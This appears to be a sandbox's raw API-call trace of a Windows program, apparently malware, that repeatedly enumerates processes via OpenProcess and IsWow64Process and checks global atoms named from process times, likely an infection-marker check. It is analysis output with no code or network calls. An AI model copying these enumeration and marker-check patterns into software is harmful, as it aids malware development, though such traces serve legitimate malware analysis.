	[0115.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0115.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0115.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0115.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0115.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0115.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0115.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0115.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0115.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0115.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0115.658] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.658] CloseHandle (hObject=0x698) returned 1
	[0115.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0115.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0115.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0115.659] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.659] CloseHandle (hObject=0x698) returned 1
	[0115.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0115.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0115.660] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.660] CloseHandle (hObject=0x698) returned 1
	[0115.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0115.660] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.660] CloseHandle (hObject=0x698) returned 1
	[0115.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0115.661] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.661] CloseHandle (hObject=0x698) returned 1
	[0115.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0115.661] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.661] CloseHandle (hObject=0x698) returned 1
	[0115.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0115.661] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.661] CloseHandle (hObject=0x698) returned 1
	[0115.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0115.661] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.661] CloseHandle (hObject=0x698) returned 1
	[0115.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0115.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0115.662] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.662] CloseHandle (hObject=0x698) returned 1
	[0115.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0115.662] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.662] CloseHandle (hObject=0x698) returned 1
	[0115.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0115.662] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.662] CloseHandle (hObject=0x698) returned 1
	[0115.662] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0115.670] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.670] CloseHandle (hObject=0x698) returned 1
	[0115.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0115.670] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.671] CloseHandle (hObject=0x698) returned 1
	[0115.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0115.671] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.671] CloseHandle (hObject=0x698) returned 1
	[0115.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0115.671] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.671] CloseHandle (hObject=0x698) returned 1
	[0115.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0115.671] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.671] CloseHandle (hObject=0x698) returned 1
	[0115.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0115.671] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.671] CloseHandle (hObject=0x698) returned 1
	[0115.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0115.672] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.672] CloseHandle (hObject=0x698) returned 1
	[0115.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0115.672] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.672] CloseHandle (hObject=0x698) returned 1
	[0115.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0115.672] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.672] CloseHandle (hObject=0x698) returned 1
	[0115.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0115.672] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.672] CloseHandle (hObject=0x698) returned 1
	[0115.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0115.672] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.672] CloseHandle (hObject=0x698) returned 1
	[0115.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0115.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.673] CloseHandle (hObject=0x698) returned 1
	[0115.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0115.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.673] CloseHandle (hObject=0x698) returned 1
	[0115.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0115.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.673] CloseHandle (hObject=0x698) returned 1
	[0115.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0115.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.673] CloseHandle (hObject=0x698) returned 1
	[0115.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0115.673] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.673] CloseHandle (hObject=0x698) returned 1
	[0115.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0115.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.674] CloseHandle (hObject=0x698) returned 1
	[0115.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0115.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.674] CloseHandle (hObject=0x698) returned 1
	[0115.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0115.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.674] CloseHandle (hObject=0x698) returned 1
	[0115.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.674] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.674] CloseHandle (hObject=0x698) returned 1
	[0115.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.675] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0115.675] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0115.675] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0115.676] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.676] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0115.676] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.676] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0115.676] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0115.676] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0115.676] CloseHandle (hObject=0x698) returned 1
	[0115.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0115.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0115.677] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.677] CloseHandle (hObject=0x698) returned 1
	[0115.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0115.677] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.677] CloseHandle (hObject=0x698) returned 1
	[0115.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0115.677] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.677] CloseHandle (hObject=0x698) returned 1
	[0115.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0115.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0115.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0115.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0115.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0115.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0115.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0115.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0115.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0115.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0115.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0115.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0115.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0115.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0115.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0115.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0115.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0115.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0115.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0115.737] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.737] CloseHandle (hObject=0x698) returned 1
	[0115.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0115.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0115.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0115.738] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.738] CloseHandle (hObject=0x698) returned 1
	[0115.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0115.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0115.738] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.738] CloseHandle (hObject=0x698) returned 1
	[0115.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0115.739] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.739] CloseHandle (hObject=0x698) returned 1
	[0115.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0115.739] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.739] CloseHandle (hObject=0x698) returned 1
	[0115.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0115.739] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.739] CloseHandle (hObject=0x698) returned 1
	[0115.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0115.739] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.739] CloseHandle (hObject=0x698) returned 1
	[0115.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0115.755] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.755] CloseHandle (hObject=0x698) returned 1
	[0115.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0115.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0115.756] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.756] CloseHandle (hObject=0x698) returned 1
	[0115.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0115.756] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.756] CloseHandle (hObject=0x698) returned 1
	[0115.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0115.756] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.756] CloseHandle (hObject=0x698) returned 1
	[0115.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0115.756] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.756] CloseHandle (hObject=0x698) returned 1
	[0115.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0115.757] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.757] CloseHandle (hObject=0x698) returned 1
	[0115.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0115.757] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.757] CloseHandle (hObject=0x698) returned 1
	[0115.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0115.757] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.757] CloseHandle (hObject=0x698) returned 1
	[0115.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0115.757] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.757] CloseHandle (hObject=0x698) returned 1
	[0115.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0115.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.758] CloseHandle (hObject=0x698) returned 1
	[0115.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0115.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.758] CloseHandle (hObject=0x698) returned 1
	[0115.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0115.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.758] CloseHandle (hObject=0x698) returned 1
	[0115.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0115.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.758] CloseHandle (hObject=0x698) returned 1
	[0115.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0115.758] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.759] CloseHandle (hObject=0x698) returned 1
	[0115.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0115.759] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.759] CloseHandle (hObject=0x698) returned 1
	[0115.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0115.759] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.759] CloseHandle (hObject=0x698) returned 1
	[0115.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0115.759] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.759] CloseHandle (hObject=0x698) returned 1
	[0115.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0115.759] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.759] CloseHandle (hObject=0x698) returned 1
	[0115.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0115.760] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.760] CloseHandle (hObject=0x698) returned 1
	[0115.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0115.760] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.760] CloseHandle (hObject=0x698) returned 1
	[0115.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0115.760] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.760] CloseHandle (hObject=0x698) returned 1
	[0115.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0115.760] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.820] CloseHandle (hObject=0x698) returned 1
	[0115.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0115.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.821] CloseHandle (hObject=0x698) returned 1
	[0115.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.821] CloseHandle (hObject=0x698) returned 1
	[0115.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0115.821] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.822] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0115.822] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0115.822] wsprintfA (in: param_1=0x3993d58, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0115.822] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.822] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0115.823] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0115.823] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0115.823] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0115.823] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0115.823] CloseHandle (hObject=0x698) returned 1
	[0115.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0115.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0115.823] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.823] CloseHandle (hObject=0x698) returned 1
	[0115.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0115.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.824] CloseHandle (hObject=0x698) returned 1
	[0115.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0115.824] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0115.824] CloseHandle (hObject=0x698) returned 1
	[0115.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0115.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0115.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0115.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0115.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0115.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0115.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0115.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0115.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0115.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0115.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0115.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0115.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0115.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0115.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0115.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0115.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.014] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.014] CloseHandle (hObject=0x698) returned 1
	[0116.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.015] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.015] CloseHandle (hObject=0x698) returned 1
	[0116.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
